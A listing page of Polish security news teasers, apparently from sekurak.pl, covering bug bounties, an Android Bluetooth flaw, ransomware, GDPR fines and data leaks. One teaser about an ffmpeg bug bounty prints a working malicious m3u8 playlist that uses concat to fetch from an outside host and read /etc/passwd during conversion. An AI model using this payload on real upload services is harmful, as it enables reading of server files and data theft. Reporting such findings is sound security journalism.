Kit to wirtualny pracownik oferowany przez platformę shopify. Nie dość że „pracuje za darmo” ;) to czasem pozwala nieźle zarobić. Tym razem zarobek został osiągnięty w dość niekonwencjonalny sposób. W pewnym miejscu można było do aplikacji zuploadować obrazek. Niektórzy z czytelników pomyślą – aha, w takim razie zamiast obrazka można…
Czytaj dalej »
Podatność umożliwia zdalnie wykonanie kod na atakowanym urządzeniu (z uprawnieniami wysoko uprawnionej usługi Bluetooth). Wystarczy tylko, że ofiara ma aktywowany Bluetooth, oraz jesteśmy w jego zasięgu. Podatne są Androidy 8.x, 9.x (być może również wcześniejsze). Na dziesiątce można „tylko” wykonać DoS – zdalnie zrestartować usługę odpowiedzialną za Bluetooth. On Android 8.0…
Czytaj dalej »
Zacznijmy od dóbr, które chcemy rozdać :-) Książka: bezpieczeństwo aplikacji www (sprzedanych mamy ponad 9000 egzemplarzy!) – do rozdania 20 sztuk Czarne t-shirty sekuraka (mamy tylko wersje męskie. Haftowane logo sekuraka) – do rozdania 20 sztuk rozmiar S M L XL XXL wzrost 168 176 182 185 188 obwód klatki piersiowej…
Czytaj dalej »
GEDIA to spora niemiecka firma działająca w branży motoryzacyjnej (dostarczają rozmaite komponenty) – mają fabryki na trzech kontynentach (również w Polsce). Niedawno dowiedzieliśmy, że firma została zainfekowana ransomware. Niby nic wielkiego, ale pojawiła się również groźba ujawnienia danych – w przypadku kiedy GEDIA nie zapłaci okupu. Nie zapłaciła – więc…
Czytaj dalej »
![Ponad 100 000 000 PLN kary z RODO dla firmy realizującej m.in. uporczywy telemarketing [Włochy]](https://sekurak.pl/wp-content/uploads/2016/11/blu-150x150.jpg "Ponad 100 000 000 PLN kary z RODO dla firmy realizującej m.in. uporczywy telemarketing [Włochy]")
Kara nałożona na operatora telekomunikacyjnego TIM została oczywiście wyrażona w Euro (dokładna kwota to: 27,802,946) i dotyczyła licznych uchybień – w tym za wydzwanianie do ludzi z telefonicznym spamem – mimo wyraźnego sprzeciwu konkretnej osoby (ach, skąd my to znamy): (…) reception of unwanted promotional calls made without consent or despite…
Czytaj dalej »
![Szczepionka na koronawirusa 2019-nCoV – opłata w Bitcoinach [uwaga na fejki!]](https://sekurak.pl/wp-content/uploads/2020/02/cor1-150x150.jpeg "Szczepionka na koronawirusa 2019-nCoV – opłata w Bitcoinach [uwaga na fejki!]")
Na pierwszy rzut oka ostatnia panika związana z nowym koronawirusem nie ma nic wspólnego z bezpieczeństwem IT. No ale na każdej panice niektórzy próbują się obłowić – niektórzy sprzedają maski ochronne na twarz w absurdalnych cenach, inni z kolei uruchamiają sklepy oferujące „szczepionkę” na 2019-nCoV: Cena jest niemała bo 0.1 BTC (~3700…
Czytaj dalej »
Nowe wydanie znanej nam dystrybucji wprowadza raczej kilka drobnych zmian i usprawnień, choć niektórzy brak domyślnego logowania na roota (root/toor) i przejście na niżej uprzywilejowanego (kali/kali) mogą traktować jako rewolucję. Ciekawostka to dostępność Kali Nethunter Rootless (edycja na smatfony), która nie wymaga roota (choć ma oczywiście pewne ograniczenia). Dodano też…
Czytaj dalej »
Opis wartego $2000 znaleziska można znaleźć tutaj. Przykładowy plik video wygląda np. tak: #EXTM3U #EXT-X-MEDIA-SEQUENCE:0 #EXTINF:10.0, concat:http://dx.su/header.m3u8|file:///etc/passwd #EXT-X-ENDLIST a cała magia dzieje się w trakcie konwersji, np.: ffmpeg -i podatny_plik.mp4 -o wynik.avi, która jest wykonywana automatycznie po uploadzie pliku od użytkownika. „Dziwna” zawartość pliku graficznego to użycie pewnej ciekawej funkcji…
Czytaj dalej »
Niedawno udostępniono wersję 1.0 nowej dokumentacji od OWASP – API Security Top Ten. Mamy tutaj 10 najczęstszych/najgroźniejszych klas podatności w API (REST-owych). Najwięcej miejsca poświęcono problemom związanym z uwierzytelnianiem / autoryzacją. Mamy również całkiem osobne, ciekawe przypadki jak choćby Mass Assignment czy tematykę Rate Limiting. Nie można też zapomnieć o całej klasyce…
Czytaj dalej »
Tytułowe pieniądze to nagroda w bug bounty, przyznana za znalezienie klucza API w jednym publicznych repozytoriów kodu Starbucksa: vinothkumar discovered a publicly available Github repository containing a Starbucks JumpCloud API Key which provided access to internal system information. Co można było uzyskać posiadając klucz do JumpCloud-a? Jeśli ktoś nie zna…
Czytaj dalej »
W stosowny oświadczeniu Microsoft opisuje całą sprawę w niezbyt jasny sposób. „Wewnętrzna baza” (czy była dostępna z zewnątrz?), „większość rekordów nie posiadało danych osobowych” (ale dane osobowe stanowiły 1 czy raczej 49% całej bazy?), czy aby pobrać dane wymagane było jakieś uwierzytelnienie? Więcej precyzyjnych informacji można jednak odnaleźć w tym miejscu….
Czytaj dalej »
Zapraszamy do udziału w kolejnej edycji SEMAFORA – konferencji dotyczącej bezpieczeństwa i audytu. Temat przewodni nadchodzącej edycji to „Nowe technologie – nowe zagrożenia„. W programie znajdą się tematy oparte wokół takich zagadnień jak m.in.: przemysł 4.0, telemedycyna, bezpieczeństwo sieci i użytkowników w technologii 5G, robotyzacja, AI i systemy autonomiczne, nowe…
Czytaj dalej »
Clearview AI to marzenie każdej ze służb. Wrzucasz zdjęcie dowolnej osoby, a dostajesz w wyniku inne zdjęcia badanego osobnika, które gdziekolwiek pokazały się w Internecie (wraz z informacją gdzie): Clearview AI, devised a groundbreaking facial recognition app. You take a picture of a person, upload it and get to see…
Czytaj dalej »
Można się trochę kłócić czy dane wyciekły czy zostały udostępnione świadomie; w każdym razie zdnet donosi: A hacker has published this week a massive list of Telnet credentials for more than 515,000 servers, home routers, and IoT (Internet of Things) „smart” devices. Wg relacji dane te są / były wykorzystywane…
Czytaj dalej »
O załatanym parę dni temu problemie pisaliśmy tutaj. Dla uniknięcia wątpliwości – podatność dotyczy tylko Windowsów 10 (oraz 2016/2019 server). Wcześniejsze wersje (np. Windows 7) nie są podatne, bo nie posiadają obsługi pewnych parametrów, które okazały się problematyczne w przypadku obsługi ECDSA. Bardziej techniczne wyjaśnienie całego problemu możecie znaleźć tutaj czy…
Czytaj dalej »
